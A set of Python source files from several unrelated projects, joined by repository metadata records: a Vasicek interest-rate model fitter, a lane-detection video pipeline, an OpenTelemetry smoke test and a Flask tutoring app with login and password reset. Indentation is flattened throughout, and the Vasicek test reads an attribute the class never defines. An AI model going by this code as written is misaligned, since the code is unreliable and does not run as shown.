class Vasicek(TimeSeriesModel):
def __init__(self):
self.drift = None
self.speed = None
self.target = None
self.volatility = None
def fit_parameters(self, dt, x, method='OLS'):
methods = {'OLS': self.fit_parameters_ols,
'MLE': self.fit_parameters_mle}
methods[method](dt, x)
def fit_parameters_ols(self, dt, x):
x1 = np.vstack((x[:-1], np.ones_like(x[:-1]))).T
y = x[1:]
(a, b), (sum_error2,), _, _ = np.linalg.lstsq(x1, y, rcond=-1)
self.speed = - np.log(a) / dt
self.target = b / (1 - a)
self.drift = self.speed * self.target
self.volatility = np.sqrt(
sum_error2 / (len(y) - 2) / (1 - a**2) * (2 * self.speed * dt))
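# The OLS fit above regresses x[t+dt] on x[t] using the exact AR(1) form of
# the Vasicek/OU process, x[t+dt] = a*x[t] + b + eps with a = exp(-speed*dt)
# and b = target*(1 - a); speed, target and volatility are then recovered
# from the estimated slope, intercept and residual sum of squares.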
def fit_parameters_mle(self, dt, x):
pass
def simulate(self, x0, t):
x = np.zeros_like(t)
x[0] = x0
a, b, s = self.speed, self.target, self.volatility
for i in range(1, len(t)):
dt = t[i] - t[i-1]
dw = np.random.randn() * np.sqrt(dt)
x[i] = x[i-1] * np.exp(-a * dt)
x[i] += b * (1-np.exp(- a * dt))
x[i] += s * np.sqrt(
(1 - np.exp(- 2 * a * dt)) / (2 * a)
) * np.random.normal()
return x
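# simulate() uses the exact one-step transition of the OU process:
# x[i] = x[i-1]*exp(-a*dt) + b*(1 - exp(-a*dt))
#        + s*sqrt((1 - exp(-2*a*dt))/(2*a)) * N(0, 1),
# so the discretisation is unbiased for any step size; note that the dw drawn
# at the top of the loop is never used.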
def main():
np.random.seed(0)
v_model = Vasicek()
v_speed, v_target, v_volatility = .5, -1., 0.1
dt = 1./250
t = np.arange(0, 5., dt)
n_run = 100
speeds = []
targets = []
volatilities = []
for _ in range(n_run):
v_model.speed = v_speed
v_model.target = v_target
v_model.volatility = v_volatility
x = v_model.simulate(0, t)
v_model.fit_parameters(dt, x)
speeds.append(v_model.parameters['speed'])
targets.append(v_model.parameters['target'])
volatilities.append(v_model.parameters['volatility'])
str_format = '.2f'
pprint(f"volatility: {np.min(volatilities):.3f} {np.mean(volatilities):.3f} {np.max(volatilities):.3f}")
pprint(f"speed: {np.min(speeds):.3f} {np.mean(speeds):.3f} {np.max(speeds):.3f}")
pprint(f"target: {np.min(targets):.3f} {np.mean(targets):.3f} {np.max(targets):.3f}")
if __name__ == "__main__":
main()
``` |
{
"source": "jnsagai/advanced-lane-lines-recognition",
"score": 2
} |
#### File: jnsagai/advanced-lane-lines-recognition/AdvancedLaneLinesVideo.py
```python
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import AdvancedComputerVision as acv
# Import everything needed to edit/save/watch video clips
from moviepy.editor import VideoFileClip
from IPython.display import HTML
##############################################################################
######################### GLOBAL PARAMETERS #############################
##############################################################################
sx_thresh = (60 , 100)
mag_thresh = (60, 200)
dir_thresh = (0.5, 1.1)
# HLS Channels threshold
h_thresh = (5, 100)
l_thresh = (210, 255)
s_thresh = (100, 255)
# Bird-eye view offsets
w_offset = 350
h_offset = 0
# Define an offset for the ROI relative to the transformation source polygon
roi_offset = 30
# Get the set of chessboard images for the calibration process
images = glob.glob('camera_cal/calibration*.jpg')
# Instances of Circular Buffers to apply the low-pass filter
left_line_cur_buf = acv.RingBuffer(20)
right_line_cur_buf = acv.RingBuffer(20)
car_center_buf = acv.RingBuffer(20)
# Last lanes fit values
prev_left_fit = np.array([])
prev_right_fit = np.array([])
##############################################################################
############################## MAIN CODE #################################
##############################################################################
# Get the distortion coefficients
mtx, dist = acv.compute_dist_coeff(images)
# Hardcoded values for the matrix transform and distortion coefficients.
# mtx = np.array([[1.15777930e+03, 0.00000000e+00, 6.67111054e+02],
# [0.00000000e+00, 1.15282291e+03, 3.86128938e+02],
# [0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
# dist = np.array([[-0.24688775, -0.02373133, -0.00109842, 0.00035108, -0.00258571]])
def process_image(image):
global prev_left_fit
global prev_right_fit
# Undistort the current frame according to the calibration parameters
undistorted = acv.cal_undistort(image, mtx, dist)
# Apply threshold for each component of the HLS color space image
combined_hls = acv.hls_threshold(undistorted, h_thresh, l_thresh, s_thresh)
# Apply Sobel threshold in the x direction
sxbinary = acv.abs_sobel_thresh(undistorted, orient='x', sobel_kernel = 3, thresh = sx_thresh)
# Apply the magnitude threshold
mag_binary = acv.mag_thresh(undistorted, sobel_kernel = 3, thresh = mag_thresh)
# Apply the direction threshold
dir_binary = acv.dir_threshold(undistorted, sobel_kernel = 3, thresh = dir_thresh)
# Combine Sobel, Magnitude and Direction threshold
combined_thres = np.zeros_like(dir_binary, dtype=np.uint8)
combined_thres[(sxbinary == 1) | ((mag_binary == 1) & (dir_binary == 1))] = 1
# Stack each channel
color_binary = np.dstack(( np.zeros_like(combined_thres), combined_thres, combined_hls)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(combined_hls == 1) | (combined_thres == 1)] = 1
# Get the warped image
# For source points I'm grabbing the outer four detected corners
img_h, img_w = combined_binary.shape[:2]
# Define the source points for the projection
src = np.float32([[200,720],
[588,450],
[693,450],
[1120,720]])
# Define the destination points for the projection
dst = np.float32([[w_offset, img_h - h_offset],
[w_offset, h_offset],
[img_w - w_offset, h_offset],
[img_w - w_offset, img_h - h_offset]])
# Create a mask edge for a region of interest based on the projection source
vertices = np.array([[(src[0][0] - roi_offset, src[0][1]),
(src[1][0] - roi_offset, src[1][1] - roi_offset),
(src[2][0] + roi_offset, src[2][1] - roi_offset),
(src[3][0] + roi_offset, src[3][1])]], dtype=np.int32)
# Based on the ROI, apply a mask on the combined binary image
masked_edges = acv.region_of_interest(combined_binary, vertices)
# Warp the image using the projection source and destination
warped_img, M, Minv = acv.warp_image(masked_edges, src, dst)
# Try to get the new line values from the previous one
# If an error occurs, then search for a new line using the whole pipeline
if prev_left_fit.size != 0 and prev_right_fit.size != 0:
error, left_fit, left_fitx, right_fit, right_fitx, ploty, lane_pixels = acv.search_around_poly(warped_img, prev_left_fit, prev_right_fit)
if (error == True):
_, left_fit, left_fitx, right_fit, right_fitx, ploty, lane_pixels = acv.fit_polynomial(warped_img)
else:
_, left_fit, left_fitx, right_fit, right_fitx, ploty, lane_pixels = acv.fit_polynomial(warped_img)
# Use the left and right lanes pixes to calculate the curvature of the road
left_curverad, right_curverad = acv.measure_curvature_real(ploty, lane_pixels)
# Apply a low-pass filter to the lane curvature by buffering the last n reading and taking the average
left_line_cur_buf.append(left_curverad)
right_line_cur_buf.append(right_curverad)
avg_left_line_cur = np.average(left_line_cur_buf.get())
avg_right_line_cur = np.average(right_line_cur_buf.get())
# Calculate the car center position relative to the lanes
car_center_dev = acv.calc_car_rel_position(warped_img.shape, ploty, left_fit, right_fit)
# Apply low-pass filter
car_center_buf.append(car_center_dev)
avg_car_center = np.average(car_center_buf.get())
# Draw the lane lines back to the original image.
unwarped_image = acv.draw_lines_original_image(undistorted, warped_img, lane_pixels, left_fitx, right_fitx, ploty, Minv)
# Write the metrics on the image
final_image = acv.write_metrics(unwarped_image, avg_left_line_cur, avg_right_line_cur, avg_car_center)
# Save the current lane line fit values
prev_left_fit = left_fit
prev_right_fit = right_fit
return final_image
clip = VideoFileClip('project_video.mp4')
white_clip = clip.fl_image(process_image)
white_clip.write_videofile('output_videos/project_video.mp4', audio=False)
``` |
{
"source": "jnschbrt/data-prepper",
"score": 2
} |
#### File: smoke-tests/otel-span-exporter/app.py
```python
from opentelemetry import trace
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.sdk.resources import Resource
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from grpc import ssl_channel_credentials
resource = Resource(attributes={
"service.name": "PythonService"
})
trace_provider = TracerProvider(resource=resource, )
otlp_exporter = OTLPSpanExporter(
endpoint="otel-collector:4317",
)
trace_provider.add_span_processor(BatchSpanProcessor(otlp_exporter))
trace.set_tracer_provider(trace_provider)
span = trace.get_current_span()
span.set_attribute("user_id", "9999")
def run():
tracer = trace.get_tracer(__name__)
with tracer.start_as_current_span("http-handler"):
with tracer.start_as_current_span("my-cool-function"):
print("I'm doing something!")
if __name__ == "__main__":
run()
``` |
{
"source": "jnsdrtlf/et",
"score": 2
} |
#### File: api/v1/lesson.py
```python
from flask import Blueprint, jsonify, request, g, redirect, url_for
from sqlalchemy import exists
from app.models import db
from app.models.enums import Status, Role, Weekday
from app.models.lesson import Lesson, LessonSchema
from app.models.time import Time
from app.models.user import User
from app.utils import requires_auth_status, requires_auth
from app.utils.tasks import tasks
bp = Blueprint('lesson_api1', __name__)
lesson_schema = LessonSchema()
lesson_schemas = LessonSchema(many=True)
@bp.route('/', methods=['POST'])
@requires_auth_status()
def lesson_post():
"""POST /
Create a new `Lesson`.
:return: JSON object with `success`, `reason` and `redirect` fields
"""
if g.session.user.status != Status.accepted or \
g.session.user.role != Role.tutor:
return jsonify({'success': False, 'reason': 'forbidden'}), 403
try:
weekday = int(request.values.get('weekday', -1))
time = int(request.values.get('time', -1))
print(time)
if time == -1 or \
not db.session.query(exists().where(Time.id == time)).scalar():
return jsonify({'success': False, 'reason': 'time'}), 401
if weekday == -1 or weekday not in Weekday.to_list():
return jsonify({'success': False, 'reason': 'weekday'}), 401
lesson = Lesson()
lesson.school_id = g.session.user.school_id
lesson.tutor_id = g.session.user_id
lesson.weekday = Weekday(weekday)
lesson.time_id = time
db.session.add(lesson)
db.session.commit()
tasks.create_events_now(lesson.id)
return redirect(url_for('index.index'))
#return lesson_schema.jsonify(lesson)
except Exception as e:
raise e
return jsonify({'success': False, 'reason': 'other'}), 401
@bp.route('/user/<int:user_id>', methods=['GET'])
@requires_auth()
def get_lesson_by_user(user_id):
""" GET /user/<int:user_id>
Get all lessons of a specific user where user_id is the unique id of
the user in question.
:return: `LessonSchema`
"""
_lessons = db.session.query(Lesson).join(User, Lesson.students) \
.filter(
(User.id == user_id) |
(Lesson.tutor_id == user_id)) \
.all()
return lesson_schemas.jsonify(_lessons)
```
#### File: api/v1/session.py
```python
from datetime import timedelta
from flask import Blueprint, request, jsonify, g, url_for
from werkzeug.exceptions import Unauthorized
from app.models import db
from app.models.enums import Status
from app.models.user import User
from app.models.session import Session
from app.utils.tasks import tasks
from app.utils import requires_auth_status, requires_auth
bp = Blueprint('session_api1', __name__)
def login(email, password, remember: bool, next_url):
"""Login
This is separated into a function as this code is also needed during
signup (see `user_api1.user_post`).
Important: This function needs to be called within the context of a
request. Otherwise, accessing `g` and `url_for` won't work.
"""
try:
user: User = db.session.query(User).filter(User.email == email).one()
if user.check_password(password):
g.session = Session(user, session_only=(not remember))
g.session.browser = str(request.user_agent.browser or '?')
g.session.platform = str(request.user_agent.platform or '?')
db.session.add(g.session)
db.session.commit()
expiration_date = g.session.last_use + timedelta(days=60)
tasks.remove_session.schedule(args=(g.session.id,), eta=expiration_date)
if user.status is Status.pending:
next_url = url_for('auth.wait')
if not user.email_confirmed:
next_url = url_for('auth.confirm')
return jsonify({
'success': True,
'redirect': next_url,
'sid': g.session.token})
else:
raise Exception()
except Exception as e:
return jsonify({'success': False, 'reason': 'credentials'}), 401
@bp.route('/', methods=['POST'])
def session_post():
"""POST /
Use this route to login a user.
Required values:
- `email`
- `password`
:return: JSON object with `redirect` url or `reason`
"""
next_url = url_for('index.index')
if g.session:
return jsonify({'redirect': next_url}), 200
email = request.values.get('email', default='')
password = request.values.get('password', default='')
remember = request.values.get('remember', default='off')
return login(email, password, bool(remember == 'on'), next_url)
@bp.route('/<session_id>', methods=['DELETE'])
@requires_auth()
def session_delete(session_id):
"""DELETE /<session_id>
Delete a session. Notice: The user requesting
this deletion must be the user owning the
corresponding session.
:return: Success if session was deleted successfully.
"""
try:
session = db.session.query(Session).filter(Session.id.is_(session_id)).one()
if not session.user_id == g.session.user.id:
return Unauthorized()
if session.id == g.session.id:
g.session = None
db.session.delete(session)
db.session.commit()
return jsonify({'success': True}), 200
except Exception as e:
return jsonify({'success': False}), 404
```
#### File: app/blueprints/auth.py
```python
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy.sql import and_
from werkzeug.exceptions import Unauthorized, Forbidden, NotFound
import urllib.parse
from flask import Blueprint, request, jsonify, g, redirect, render_template, flash, url_for
from flask_babel import gettext
from app.models.enums import Status, Role
from app.models.user import User
from app.models.subject import Subject
from app.models.grade import Grade
from app.models import db
from app.utils import requires_auth
import app.utils.tasks.mail as mail
bp = Blueprint('auth', __name__)
@bp.route('/signup', methods=['GET'])
def signup_get():
"""GET /signup
This route only works if the user is not yet authenticated.
The user will be redirected to next_url otherwise.
:return: render_template or redirect
"""
next_url = url_for('index.index')
if g.session:
flash(gettext('You are already logged in'), 'success')
return redirect(next_url)
return render_template('sites/auth/signup.html', title=gettext('Signup'))
@bp.route('/login', methods=['GET'])
def login_get():
"""GET /login
This route only works if the user is not yet authenticated.
The user will be redirected to next_url otherwise.
:return: render_template or redirect
"""
next_url = url_for('index.index')
if g.session:
flash(gettext('You are already logged in'), 'success')
return redirect(next_url)
return render_template('sites/auth/login.html', title=gettext('Login'))
@bp.route('/login', methods=['POST'])
def login_post():
"""POST /login
Deprecated. Use the api backend (`session_api1.session_post`) to
create a new session and log in.
"""
return redirect(url_for('session_api1.session_post'))
@bp.route('/auth/reset', methods=['GET'])
def reset_get():
"""GET /auth/reset?token=<string:token>
Reset password route. If a valid token is provided,
the password can be reset. If no token is provided,
the email textbox will be rendered to request a new
reset link via email.
:return: Template for password reset
"""
next_url = url_for('index.index')
if g.session:
flash(gettext('You are already logged in'), 'success')
return redirect(next_url)
token = request.args.get('token')
if token:
try:
user = db.session.query(User) \
.filter((User.password_token == token) & User.reset_active) \
.one()
if user.is_reset_expired():
return NotFound()
return render_template('sites/auth/reset.html',
title=gettext('Reset'),
password=True, password_token=token)
except NoResultFound:
return NotFound()
else:
return render_template('sites/auth/reset.html',
title=gettext('Reset'),
email=True, password=False)
@bp.route('/auth/reset-status')
def reset_status():
"""GET /auth/reset-status
Simple status page for password reset.
"""
return render_template(
'sites/auth/reset_status.html', title=gettext('Reset'),
sent=request.values.get('sent', default=False),
success=request.values.get('success', default=False))
@bp.route('/auth/reset', methods=['POST'])
def reset_post():
"""POST /auth/reset
Request a password reset link via email or
reset the password if a token is specified.
:return:
"""
if g.session:
# User is already authenticated
return jsonify({'redirect': url_for('index.index')})
form = request.values.get('form', default='email')
token = request.values.get('token', default='')
email = request.values.get('email', default='')
password = request.values.get('password', default='')
if form == 'password':
try:
user: User = db.session.query(User) \
.filter((User.password_token == token) & User.reset_active) \
.one()
if user.is_reset_expired():
return jsonify({'success': False, 'reason': 'expired'}), 401
if len(password) < 8:
return jsonify({'success': False, 'reason': 'password'}), 401
user.set_password(password)
db.session.commit()
next_url = url_for('auth.reset_status', success=True)
return jsonify({'success': True, 'redirect': next_url})
except NoResultFound:
return jsonify({'success': False, 'reason': 'token not found'}), 401
else:
try:
user: User = db.session.query(User) \
.filter(User.email == email).one()
user.reset_password()
db.session.commit()
reset_url = urllib.parse.urljoin(
request.host_url,
url_for('auth.reset_get', token=user.password_token))
kwargs = {
'subject': gettext('Reset Password'),
'body': reset_url,
'recipients': [user.email]
}
mail.send_mail(**kwargs)
next_url = url_for('auth.reset_status', sent=True)
return jsonify({'success': True, 'redirect': next_url})
except NoResultFound:
return jsonify({'success': False, 'reason': 'email'}), 401
@bp.route('/auth/confirm', methods=['GET'])
@requires_auth()
def confirm():
"""GET /auth/confirm
Confirm the user's email address. The provided token
must be valid.
:return: redirect if successful
"""
if g.session.user.email_confirmed:
return redirect(url_for('index.index'))
token = request.args.get('token')
if token:
try:
user: User = db.session.query(User) \
.filter(User.confirmation_token == token).one()
user.email_confirmed = True
user.confirmation_token = None
db.session.merge(user)
db.session.commit()
return render_template('sites/auth/confirm.html',
title=gettext('Confirm Email'),
sent=False, success=True), 200
except NoResultFound:
return render_template('sites/auth/confirm.html',
title=gettext('Confirm Email'),
sent=False, success=False), 401
else:
return render_template('sites/auth/confirm.html',
title=gettext('Confirm Email'), sent=True), 200
@bp.route('/auth/wait')
@requires_auth()
def wait():
if g.session.user.status is Status.accepted:
return redirect(url_for('index.index'))
return render_template('sites/auth/wait.html',
title=gettext('Wait'),
status=g.session.user.status.value)
@bp.route('/logout')
def logout():
if g.session:
g.session.revoked = True
db.session.commit()
g.session = None
return redirect(url_for('index.index'))
@bp.route('/config', methods=['GET'])
def config():
if g.school:
return redirect(url_for('index.index'))
stage = request.args.get('stage', 'school')
if not g.school:
pass
#stage = 'school'
template = 'sites/auth/config-%s.html'
if stage in ['school', 'admin', 'subjects', 'time', 'grades']:
return render_template(template % stage, title=gettext('Config'))
else:
return NotFound()
"""@bp.route('/config', methods=['POST'])
@requires_auth()
def config_post():
if g.session.user.role != Role.admin \
and g.session.user.status != Status.accepted:
return Forbidden()
name = request.values.get('name', '')
subjects = request.values.getlist('subjects[]')
grades = request.values.getlist('grades[]')
g.config = Config()
g.config.id = 1
g.config.school_name = name
db.session.merge(g.config)
for subject in subjects:
_subject = Subject()
_subject.school_id = g.school.id
_subject.name = subject
db.session.add(_subject)
for grade in grades:
_grade = Grade()
_grade.school_id = g.school.id
_grade.name = grade
db.session.add(_grade)
db.session.commit()
return jsonify({'success': True, 'redirect': url_for('index.index')})
"""
```
#### File: et/app/__init__.py
```python
import os
import warnings
warnings.filterwarnings('ignore', message='greenlet.greenlet size changed')
from flask import Flask, request, g, redirect, url_for
# TODO add option `minimal=False` for things like task
def create_app(root_path, minimal=False):
app_name = 'minimal_app' if minimal else __name__
app = Flask(app_name, root_path=root_path)
config = os.environ.get('CONFIG', default='config/dev.cfg')
secrets = os.environ.get('SECRETS', default='config/secret.cfg')
app.config.from_pyfile(os.path.abspath(config))
app.config.from_pyfile(os.path.abspath(secrets))
app.secret_key = app.secret_key.encode()
app.static_url_path = app.config.get('STATIC_FOLDER')
app.static_folder = os.path.join(app.root_path, app.static_url_path)
app.template_folder = os.path.join(
app.root_path, app.config.get('TEMPLATE_FOLDER'))
from app.models.event import Event
from app.models.grade import Grade
from app.models.lesson import Lesson
from app.models.period import Period
from app.models.relationships import UserGrade, UserLesson, UserSubject
from app.models.report import Report
from app.models.school import School
from app.models.session import Session
from app.models.subject import Subject
from app.models.time import Time
from app.models.user import User
from app.models import db
db.init_app(app)
if not minimal:
from app.blueprints.api import v1
from app.blueprints.api.v1 import user as user_api
from app.blueprints.api.v1 import lesson as lesson_api
from app.blueprints.api.v1 import session as session_api
from app.blueprints import auth
from app.blueprints import index
from app.blueprints import user as user
from app.models.enums import Locale
from app.models import ma
from app.i18n import babel, moment
import app.utils as utils
from app.utils.tasks import tasks
babel.init_app(app)
moment.init_app(app)
ma.init_app(app)
db.create_all(app=app)
@app.after_request
def call_after_request_callbacks(response):
for callback in getattr(g, 'after_request_callbacks', ()):
callback(response)
return response
@app.before_request
def auth_middleware():
sid = request.cookies.get(
'sid', default='') or request.values.get('sid')
session_result = Session.verify(sid)
if session_result:
g.session = session_result
g.locale = g.session.user.locale.value
else:
g.session = None
g.locale = utils.get_best_locale().value
@utils.after_this_request
def set_cookie(response):
if g.session:
g.session.set_cookie(response)
@app.before_request
def config_middleware():
try:
g.school = db.session.query(
School).filter(School.id == 1).one()
except:
g.school = False
endpoints = [
'static', 'auth.config', None,
'school_api1.school_post',
'school_api1.school_put'
]
if request.endpoint not in endpoints:
app.logger.info('No school found. Redirect to config')
return redirect(url_for('auth.config', stage='school'))
@babel.localeselector
def get_locale():
return g.locale
# ------------
# API routes
# ------------
app.register_blueprint(v1.bp, url_prefix='/api/v1')
app.register_blueprint(user_api.bp, url_prefix='/api/v1/user')
app.register_blueprint(session_api.bp, url_prefix='/api/v1/session')
app.register_blueprint(lesson_api.bp, url_prefix='/api/v1/lesson')
# ------------
# Frontend
# ------------
app.register_blueprint(auth.bp)
app.register_blueprint(user.bp, url_prefix='/user')
app.register_blueprint(index.bp)
tasks.create_events()
return app, db
```
#### File: app/models/enums.py
```python
from enum import Enum
from aenum import MultiValueEnum
class Weekday(Enum):
"""Weekdays
Used to identify weekly repeating lessons. Starting with `monday`
according to the python documentation (see `date.weekday()`)
"""
monday = 0
tuesday = 1
wednesday = 2
thursday = 3
friday = 4
saturday = 5
sunday = 6
@staticmethod
def to_list():
return list(map(lambda c: c.value, Weekday))
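# A minimal usage sketch (hypothetical date, standard library only):
#   from datetime import date
#   Weekday(date(2024, 1, 1).weekday()) is Weekday.monday   # True; 2024-01-01 was a Monday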
class Role(Enum):
"""User roles
none: default, no privileges
admin: highest privileges
editor: maintainer for a specific school
tutor: student or tutor
has to be approved (see `Status`)
student: student (can only access one school)
"""
none = 'none'
admin = 'admin'
editor = 'editor'
tutor = 'tutor'
student = 'student'
class Status(Enum):
"""Status for approval of users
pending: has to be approved
accepted: approved
rejected: not eligible for teaching. No reason given
"""
pending = 'pending'
accepted = 'accepted'
rejected = 'rejected'
class Locale(MultiValueEnum):
"""Supported locale settings
default: 'de'
A multi-value enum is used for different formats. Some browsers
(e.g. Safari) use the long format (e.g. `en_US`) while others use a
shorter format (such as `de`).
"""
de = 'de_DE', 'de'
en = 'en_US', 'en'
@staticmethod
def to_list():
return list(map(lambda c: c.value, Locale))
@staticmethod
def to_short_list():
return list(map(lambda c: c.value[:2], Locale))
@staticmethod
def default():
return Locale.de
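# A minimal sketch of the aenum MultiValueEnum behaviour assumed here: every
# listed value maps to the same member, and .value returns the first (long) form.
#   Locale('de') is Locale('de_DE')   # True
#   Locale.default().value            # 'de_DE'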
```
#### File: app/models/school.py
```python
from app.models import db, ma
class School(db.Model):
"""School
This table stores the configuration for each individual school.
Schools are addressed through their short name.
"""
__tablename__ = 'school'
id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
school_name = db.Column(db.String(48), nullable=False)
# `short_name` can be used as a subdomain (e.g. abc.tuutor.de)
short_name = db.Column(db.String(8), nullable=False, unique=True)
# Duration of a typical lesson (see `time` or `lesson`) in minutes
lesson_duration = db.Column(db.Integer, nullable=False, default=45)
def __repr__(self):
return f'<School {self.short_name}>'
```
#### File: app/models/user.py
```python
import secrets
import hashlib
from datetime import datetime, timedelta
import bcrypt
from app.models import db, ma
from app.models.enums import Role, Status, Locale, Weekday
class User(db.Model):
"""
User object to store user information
"""
default_picture_path = '/static/images/profile/%s.png'
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
school_id = db.Column(db.Integer, db.ForeignKey('school.id'),
nullable=False)
# personal information
name = db.Column(db.String(48), nullable=False)
email = db.Column(db.String(48), unique=True, nullable=False)
password = db.Column(db.LargeBinary, nullable=False)
teacher_name = db.Column(db.String(48), nullable=True)
picture = db.Column(db.String(128), nullable=True, unique=False)
has_placeholder = db.Column(db.Boolean, nullable=False, unique=False,
default=True)
locale = db.Column(db.Enum(Locale), nullable=False, default=Locale.en)
# email confirmation
email_confirmed = db.Column(db.Boolean, nullable=False, default=False)
confirmation_token = db.Column(db.String(32), unique=True, nullable=True)
# password reset
password_token = db.Column(db.String(32), unique=True, nullable=True)
last_reset = db.Column(db.DateTime, nullable=True, unique=False)
reset_active = db.Column(db.Boolean, nullable=False, default=False)
# school relationship
role = db.Column(db.Enum(Role), nullable=False, default=Role.none)
status = db.Column(db.Enum(Status), nullable=True, default=Status.pending)
grade_id = db.Column(db.Integer, db.ForeignKey('grade.id'), nullable=True)
# subjects
subjects = db.relationship('Subject', secondary='user_subject',
back_populates='users')
grade = db.relationship('Grade', foreign_keys=[grade_id],
back_populates='users')
tutor_grades = db.relationship('Grade', secondary='user_grade')
reports = db.relationship('Report', back_populates='user')
tutor_lessons = db.relationship(
'Lesson', back_populates='tutor',
primaryjoin='Lesson.tutor_id == User.id')
student_lessons = db.relationship(
'Lesson', secondary='user_lesson',
back_populates='students',
primaryjoin='(Lesson.id == UserLesson.lesson_id) & '
'(User.id == UserLesson.user_id)')
sessions = db.relationship('Session', back_populates='user')
def __init__(self, role: Role):
self.email_confirmed = False
self.confirmation_token = secrets.token_hex(32)
self.role = role
self.status = Status.pending
def __repr__(self):
return f'<User {self.name}>'
def reset_password(self):
self.last_reset = datetime.now()
self.reset_active = True
self.password_token = secrets.token_hex(32)
def is_reset_expired(self):
return (self.last_reset + timedelta(minutes=30)) < datetime.now()
def update_email(self, email):
self.email = email
self.email_confirmed = False
self.confirmation_token = secrets.token_hex(32)
def set_password(self, password):
self.reset_active = False
self.password_token = None
self.password = bcrypt.hashpw(password.encode(), bcrypt.gensalt(12))
def check_password(self, password):
return bcrypt.checkpw(password.encode(), self.password)
def set_picture(self, name: str):
self.picture = self.default_picture_path % name
def get_initials(self):
initials = self.name[0]
if ' ' in self.name:
# add first letter of last name
initials += self.name.split(' ')[-1][0]
return initials
class UserSchema(ma.Schema):
subjects = ma.Nested('SubjectSchema', many=True, exclude=('users',))
grade = ma.Nested('GradeSchema', exclude=('users',))
tutor_grades = ma.Nested('GradeSchema', many=True, exclude=('users',))
tutor_lessons = ma.Nested('LessonSchema', many=True, exclude=('tutor',))
student_lessons = ma.Nested('LessonSchema', many=True, exclude=('students',))
role = ma.Method('get_role')
status = ma.Method('get_status')
def get_role(self, obj: User):
return obj.role.value
def get_status(self, obj: User):
return obj.status.value
class Meta:
fields = (
'id', 'name', 'picture',
'role', 'subjects', 'status',
'grade', 'tutor_grades', 'teacher_name',
'tutor_lessons', 'student_lessons')
class UserSchemaWeekdays(UserSchema):
class Meta:
fields = (
'id', 'name', 'picture',
'role', 'subjects', 'status',
'grade', 'tutor_grades', 'teacher_name',
'tutor_lessons', 'student_lessons', 'weekdays')
```
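The password fields above are handled with `bcrypt`; here is a small stand-alone sketch of the same hash-and-verify round trip performed by `set_password` and `check_password` (the plaintext is made up for illustration):
```python
import bcrypt

# Hash with a work factor of 12, as in User.set_password.
hashed = bcrypt.hashpw("correct horse battery staple".encode(), bcrypt.gensalt(12))

# Verify, as in User.check_password.
assert bcrypt.checkpw("correct horse battery staple".encode(), hashed)
assert not bcrypt.checkpw("wrong password".encode(), hashed)
```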
#### File: utils/tasks/picture.py
```python
from os import path
import random
import secrets
from PIL import Image, ImageFont, ImageDraw
from app import create_app
from app.models.user import User
from app.utils.tasks import huey
width = 480
height = 480
font_size = 260
colors = [
[
(23, 126, 137, 255),
(255, 255, 255, 140)
],
[
(8, 76, 97, 255),
(255, 255, 255, 140)
],
[
(219, 58, 52, 255),
(255, 255, 255, 140)
],
[
(255, 200, 87, 255),
(31, 45, 61, 178)
],
[
(50, 48, 49, 255),
(255, 255, 255, 140)
]
]
@huey.task()
def create_user_image(user_id):
app, db = create_app(None, minimal=True)
with app.app_context():
user = db.session.query(User).filter(User.id.is_(user_id)).one()
color = random.choice(colors)
image = Image.new('RGBA', (width, height), color[0])
initials_image = Image.new('RGBA', image.size, (0, 0, 0, 0))
initials = user.get_initials()
font = ImageFont.truetype(path.join(app.static_folder, 'css', 'Roboto-Light.ttf'), font_size)
draw = ImageDraw.Draw(initials_image)
_w, _h = draw.textsize(initials, font=font)
draw.text(((width - _w) / 2, (height - font_size) / 2.4), initials, fill=color[1], font=font)
image_name = f'{user.id}-{secrets.token_hex(16)}'
image_path = path.join(app.static_folder, 'images', 'profile', f'{image_name}.png')
image = Image.alpha_composite(image, initials_image)
image = image.convert('RGB')
image.save(image_path)
del image
user.set_picture(image_name)
db.session.merge(user)
db.session.commit()
```
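Because `create_user_image` is decorated with `@huey.task()`, calling it only enqueues the job for the huey consumer; a hypothetical call site (e.g. right after a user registers) could look like this, where `new_user` is a placeholder:
```python
# Enqueue immediately; the huey worker renders and stores the image.
create_user_image(new_user.id)

# Or defer it, mirroring the scheduling style used in tasks.py below.
create_user_image.schedule(args=(new_user.id,), delay=60)
```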
#### File: utils/tasks/tasks.py
```python
from datetime import datetime, timedelta
from huey import crontab
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy.sql import exists
from app import create_app
from app.models.session import Session
from app.models.period import Period
from app.models.event import Event
from app.models.lesson import Lesson
from app.utils.tasks import huey
@huey.task()
def remove_session(session_id):
"""Remove session
"""
app, db = create_app(None, minimal=True)
with app.app_context():
try:
session: Session = db.session.query(Session) \
.filter(Session.id == session_id) \
.one()
if session.is_expired():
db.session.delete(session)
else:
expiration_date = session.last_use + timedelta(days=60)
remove_session.schedule(args=(session_id,), eta=expiration_date)
except NoResultFound:
print(f'Session {session_id} not found.')
@huey.periodic_task(crontab(day_of_week='1'))
def create_events():
app, db = create_app(None, minimal=True)
with app.app_context():
lessons = db.session.query(Lesson).all()
for lesson in lessons:
create_event_for_lesson(db, lesson)
@huey.task()
def create_events_now(lesson_id):
app, db = create_app(None, minimal=True)
with app.app_context():
lesson: Lesson = db.session.query(Lesson) \
.filter(Lesson.id == lesson_id).one()
create_event_for_lesson(db, lesson)
def next_weekday(date, weekday: int):
days_ahead = weekday - date.weekday()
if days_ahead <= 0:
days_ahead += 7
return (date + timedelta(days=days_ahead))
def create_event_for_lesson(db, lesson):
events = db.session.query(Event) \
.filter((Event.lesson_id == lesson.id) &
(Event.date > datetime.now().date())) \
.order_by(Event.date) \
.all()
last_date = datetime.now().date() if len(events) == 0 else events[-1].date
for i in range(len(events), 4):
next_date = next_weekday(last_date, lesson.weekday.value)
"""current_period = db.session.query(Period) \
.filter((Period.school_id == lesson.school_id) &
(Period.begin_date < next_date) &
(Period.due_date > next_date)) \
.one()"""
_event = Event()
_event.date = next_date
_event.school_id = lesson.school_id
_event.lesson_id = lesson.id
_event.period_id = 1
db.session.add(_event)
last_date = next_date
db.session.commit()
``` |
